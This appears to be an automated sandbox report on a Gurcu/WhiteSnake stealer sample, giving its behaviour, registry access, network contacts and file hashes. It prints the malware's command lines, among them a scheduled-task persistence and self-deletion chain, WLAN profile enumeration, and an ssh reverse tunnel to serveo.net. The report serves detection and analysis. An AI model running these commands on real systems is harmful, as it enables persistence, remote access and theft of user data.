Malware Analysis Report

2024-10-19 06:43

Sample ID 230908-j55t4saa54
Target a43b860d290321de53ed6deb5cae95af.exe
SHA256 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538
Tags
gurcu collection discovery spyware stealer
score
10/10


Analysis Overview

score
10/10

SHA256

6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538

Threat Level: Known bad

The file a43b860d290321de53ed6deb5cae95af.exe was found to be: Known bad.

Malicious Activity Summary

gurcu collection discovery spyware stealer

Detect Gurcu Stealer V3 payload

Gurcu family

Gurcu, WhiteSnake

Checks computer location settings

Loads dropped DLL

Deletes itself

Reads user/profile data of web browsers

Executes dropped EXE

Accesses Microsoft Outlook profiles

Checks installed software on the system

Looks up external IP address via web service

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

outlook_office_path

Suspicious use of AdjustPrivilegeToken

outlook_win_path

Runs ping.exe

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

Modifies system certificate store

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-09-08 08:16

Signatures

Detect Gurcu Stealer V3 payload

Description Indicator Process Target
N/A N/A N/A N/A

Gurcu family

gurcu

Analysis: behavioral1

Detonation Overview

Submitted

2023-09-08 08:16

Reported

2023-09-08 08:18

Platform

win7-20230831-en

Max time kernel

148s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a43b860d290321de53ed6deb5cae95af.exe"

Signatures

Detect Gurcu Stealer V3 payload

Description Indicator Process Target
N/A N/A N/A N/A

Gurcu, WhiteSnake

stealer gurcu

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe N/A

Checks installed software on the system

discovery

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a43b860d290321de53ed6deb5cae95af.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2576 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\a43b860d290321de53ed6deb5cae95af.exe C:\Windows\System32\cmd.exe
PID 1256 wrote to memory of 2620 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 1256 wrote to memory of 2712 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 1256 wrote to memory of 2500 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1256 wrote to memory of 2616 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe
PID 2616 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe C:\Windows\system32\cmd.exe
PID 2548 wrote to memory of 2448 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2548 wrote to memory of 2960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2548 wrote to memory of 2192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 2616 wrote to memory of 312 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe C:\Windows\system32\cmd.exe
PID 312 wrote to memory of 1952 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 312 wrote to memory of 388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 312 wrote to memory of 1716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 2616 wrote to memory of 1844 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
PID 2788 wrote to memory of 2352 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe
PID 2352 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe C:\Windows\system32\cmd.exe
PID 2884 wrote to memory of 2264 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2884 wrote to memory of 1256 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2884 wrote to memory of 2600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 2352 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe C:\Windows\system32\cmd.exe
PID 2004 wrote to memory of 1968 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com

Uses Task Scheduler COM API

persistence

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\a43b860d290321de53ed6deb5cae95af.exe

"C:\Users\Admin\AppData\Local\Temp\a43b860d290321de53ed6deb5cae95af.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "a43b860d290321de53ed6deb5cae95af" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\a43b860d290321de53ed6deb5cae95af.exe" &&START "" "C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping 127.0.0.1

C:\Windows\system32\schtasks.exe

schtasks /create /tn "a43b860d290321de53ed6deb5cae95af" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe

"C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe"

C:\Windows\system32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\findstr.exe

findstr /R /C:"[ ]:[ ]"

C:\Windows\system32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\system32\findstr.exe

findstr "SSID BSSID Signal"

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

"C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:8661 serveo.net

C:\Windows\system32\taskeng.exe

taskeng.exe {14259D2D-B483-426D-98C8-CF75E3611BDE} S-1-5-21-607259312-1573743425-2763420908-1000:NGTQGRML\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe

C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe

C:\Windows\system32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\findstr.exe

findstr /R /C:"[ ]:[ ]"

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"

C:\Windows\system32\chcp.com

chcp 65001

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

"C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:8661 serveo.net

C:\Windows\system32\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\system32\findstr.exe

findstr "SSID BSSID Signal"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 140.82.112.4:443 github.com tcp
N/A 127.0.0.1:8661 tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 serveo.net udp
DE 159.89.214.31:22 serveo.net tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
GB 217.145.238.175:80 217.145.238.175 tcp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 apps.identrust.com udp
US 2.18.121.132:80 apps.identrust.com tcp

Files

memory/2576-0-0x0000000000210000-0x0000000000272000-memory.dmp

memory/2576-1-0x000007FEF59F0000-0x000007FEF63DC000-memory.dmp

memory/2576-2-0x000000001B2E0000-0x000000001B360000-memory.dmp

memory/2576-5-0x000007FEF59F0000-0x000007FEF63DC000-memory.dmp

C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe

MD5 a43b860d290321de53ed6deb5cae95af
SHA1 62cc70d91f7e39fc93b9b0f106f78a90cfc54047
SHA256 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538
SHA512 535cca5f0fdd3efecfca76760ab914b1c29ef7accc4e0789e5f658b1aa922fac854cfca752c745843c667d3be67672185973a79335496ef4b0a0f73d47c3b1a5

memory/2616-9-0x000007FEF5000000-0x000007FEF59EC000-memory.dmp

memory/2616-10-0x0000000000CD0000-0x0000000000D32000-memory.dmp

memory/2616-11-0x0000000000470000-0x00000000004F0000-memory.dmp

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

MD5 d1ce628a81ab779f1e8f7bf7df1bb32c
SHA1 011c90c704bb4782001d6e6ce1c647bf2bb17e01
SHA256 2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71
SHA512 de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\libcrypto.dll

MD5 79a6e2268dfdba1d94c27f4b17265ff4
SHA1 b17eed8cb6f454700f8bfcfd315d5627d3cf741c
SHA256 6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5
SHA512 3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c

\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\libcrypto.dll

MD5 79a6e2268dfdba1d94c27f4b17265ff4
SHA1 b17eed8cb6f454700f8bfcfd315d5627d3cf741c
SHA256 6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5
SHA512 3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c

memory/2616-126-0x000007FEF5000000-0x000007FEF59EC000-memory.dmp

memory/2616-127-0x0000000000470000-0x00000000004F0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab9A10.tmp

MD5 f3441b8572aae8801c04f3060b550443
SHA1 4ef0a35436125d6821831ef36c28ffaf196cda15
SHA256 6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf
SHA512 5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

C:\Users\Admin\AppData\Local\Temp\Tar9AAF.tmp

MD5 9441737383d21192400eca82fda910ec
SHA1 725e0d606a4fc9ba44aa8ffde65bed15e65367e4
SHA256 bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5
SHA512 7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9243b84ee0e68751cc2c365baa4c29bc
SHA1 73ea73b428ab02b5594a35a236301381807be227
SHA256 741e53325f380864f1a841243c74b01b2466cc307a02bddfdf8d447e161b5dce
SHA512 ef36b7578f1651d187304a1c002d0619c6704cb8498a6c1921301661e5591eeb04523f815325b2be5438ba46c7f683ecca77602e57bd6e0fce8f571a3f73129e

C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe

MD5 a43b860d290321de53ed6deb5cae95af
SHA1 62cc70d91f7e39fc93b9b0f106f78a90cfc54047
SHA256 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538
SHA512 535cca5f0fdd3efecfca76760ab914b1c29ef7accc4e0789e5f658b1aa922fac854cfca752c745843c667d3be67672185973a79335496ef4b0a0f73d47c3b1a5

memory/2352-190-0x000007FEF5000000-0x000007FEF59EC000-memory.dmp

memory/2352-191-0x000000001B2A0000-0x000000001B320000-memory.dmp

C:\Users\Admin\AppData\Local\w3bgb431s6\port.dat

MD5 919d2356219c1fa0c0bd560246532c72
SHA1 264be81b3a6dee19eb8b68a894d7050d94edf1a6
SHA256 ba64fc14ebb32368ef763cc24dfbabfaa7b23a3538bc0b8d3f1a690f281238df
SHA512 2021c12151f7cfd37898f1fb398c6a1d12c1053e43641234fd42319d83b27a079aa376c7d8ae20a9bd8eed608c2216157502abd5fde6a2257c1c5b1f8b73c22c

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

MD5 d1ce628a81ab779f1e8f7bf7df1bb32c
SHA1 011c90c704bb4782001d6e6ce1c647bf2bb17e01
SHA256 2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71
SHA512 de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\libcrypto.dll

MD5 79a6e2268dfdba1d94c27f4b17265ff4
SHA1 b17eed8cb6f454700f8bfcfd315d5627d3cf741c
SHA256 6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5
SHA512 3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c

C:\Users\Admin\.ssh\known_hosts

MD5 18015a60cd12f33648facec1263cfafa
SHA1 31b7afd9a2dc51bfad694e5772d430fceedbac3f
SHA256 9ab8d1a229e05070a0364b5c5efd2ab1ddf676b0bc00314ec336bcdc00998190
SHA512 fcdb2e02f01c59916eaa08baeb74cc2f61eed6d96873f41a2299b752b9ec1af5db74a6eac6013c9a45a77d0bbc0431590f16fa74cff779eea97383e2fe073925

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 856e50bb01e48a10d2611fefcdbb6970
SHA1 0687754123604c49fd05d04a0088c785bf480fae
SHA256 4f581d760957eb1473f471fdfa12247fdcb0efd058df6dba78c42df1f1b56253
SHA512 d4298076759621744abc2b7990855b05df11a70b0a864c4fc44bacbf5b68b0979db0123ffad27e59b84ceebbee89fde21a717b169eb82392ca68e46b2e968072

memory/2352-214-0x000007FEF5000000-0x000007FEF59EC000-memory.dmp

memory/2352-215-0x000000001B2A0000-0x000000001B320000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-09-08 08:16

Reported

2023-09-08 08:18

Platform

win10v2004-20230831-en

Max time kernel

150s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a43b860d290321de53ed6deb5cae95af.exe"

Signatures

Detect Gurcu Stealer V3 payload

Description Indicator Process Target
N/A N/A N/A N/A

Gurcu, WhiteSnake

stealer gurcu

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1859779917-101786662-3680946609-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a43b860d290321de53ed6deb5cae95af.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1859779917-101786662-3680946609-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1859779917-101786662-3680946609-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1859779917-101786662-3680946609-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe N/A

Checks installed software on the system

discovery

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence

Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a43b860d290321de53ed6deb5cae95af.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2564 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\a43b860d290321de53ed6deb5cae95af.exe C:\Windows\System32\cmd.exe
PID 2992 wrote to memory of 2144 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 2992 wrote to memory of 1564 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2992 wrote to memory of 628 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2992 wrote to memory of 2520 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe
PID 2520 wrote to memory of 1148 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe C:\Windows\SYSTEM32\cmd.exe
PID 1148 wrote to memory of 2784 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\chcp.com
PID 1148 wrote to memory of 532 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\netsh.exe
PID 1148 wrote to memory of 1232 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\findstr.exe
PID 2520 wrote to memory of 4296 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe C:\Windows\System32\OpenSSH\ssh.exe
PID 2520 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe C:\Windows\SYSTEM32\cmd.exe
PID 976 wrote to memory of 3728 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\chcp.com
PID 976 wrote to memory of 3812 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\netsh.exe
PID 976 wrote to memory of 1808 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\findstr.exe

Uses Task Scheduler COM API

persistence

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1859779917-101786662-3680946609-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1859779917-101786662-3680946609-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\a43b860d290321de53ed6deb5cae95af.exe

"C:\Users\Admin\AppData\Local\Temp\a43b860d290321de53ed6deb5cae95af.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "a43b860d290321de53ed6deb5cae95af" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\a43b860d290321de53ed6deb5cae95af.exe" &&START "" "C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping 127.0.0.1

C:\Windows\system32\schtasks.exe

schtasks /create /tn "a43b860d290321de53ed6deb5cae95af" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe

"C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\findstr.exe

findstr /R /C:"[ ]:[ ]"

C:\Windows\System32\OpenSSH\ssh.exe

"ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:3716 serveo.net

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\system32\findstr.exe

findstr "SSID BSSID Signal"

Network

Country Destination Domain Proto
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
N/A 127.0.0.1:3716 tcp
US 8.8.8.8:53 serveo.net udp
DE 159.89.214.31:22 serveo.net tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 31.214.89.159.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
GB 217.145.238.175:80 217.145.238.175 tcp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 232.200.77.51.in-addr.arpa udp
US 8.8.8.8:53 11.78.23.94.in-addr.arpa udp
US 8.8.8.8:53 175.238.145.217.in-addr.arpa udp
US 8.8.8.8:53 153.136.76.144.in-addr.arpa udp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 240.81.21.72.in-addr.arpa udp
US 8.8.8.8:53 88.65.42.20.in-addr.arpa udp

Files

memory/2564-0-0x000001F6D2F90000-0x000001F6D2FF2000-memory.dmp

memory/2564-1-0x00007FFB09F90000-0x00007FFB0AA51000-memory.dmp

memory/2564-4-0x000001F6ED6E0000-0x000001F6ED6F0000-memory.dmp

memory/2564-6-0x00007FFB09F90000-0x00007FFB0AA51000-memory.dmp

C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe

MD5 a43b860d290321de53ed6deb5cae95af
SHA1 62cc70d91f7e39fc93b9b0f106f78a90cfc54047
SHA256 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538
SHA512 535cca5f0fdd3efecfca76760ab914b1c29ef7accc4e0789e5f658b1aa922fac854cfca752c745843c667d3be67672185973a79335496ef4b0a0f73d47c3b1a5

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\a43b860d290321de53ed6deb5cae95af.exe.log

MD5 3308a84a40841fab7dfec198b3c31af7
SHA1 4e7ab6336c0538be5dd7da529c0265b3b6523083
SHA256 169bc31a8d1666535977ca170d246a463e6531bb21faab6c48cb4269d9d60b2e
SHA512 97521d5fb94efdc836ea2723098a1f26a7589a76af51358eee17292d29c9325baf53ad6b4496c5ca3e208d1c9b9ad6797a370e2ae378072fc68f5d6e8b73b198

memory/2520-11-0x00007FFB099F0000-0x00007FFB0A4B1000-memory.dmp

memory/2520-12-0x00000289F3580000-0x00000289F3590000-memory.dmp

memory/2520-15-0x00007FFB099F0000-0x00007FFB0A4B1000-memory.dmp

memory/2520-16-0x00000289F3580000-0x00000289F3590000-memory.dmp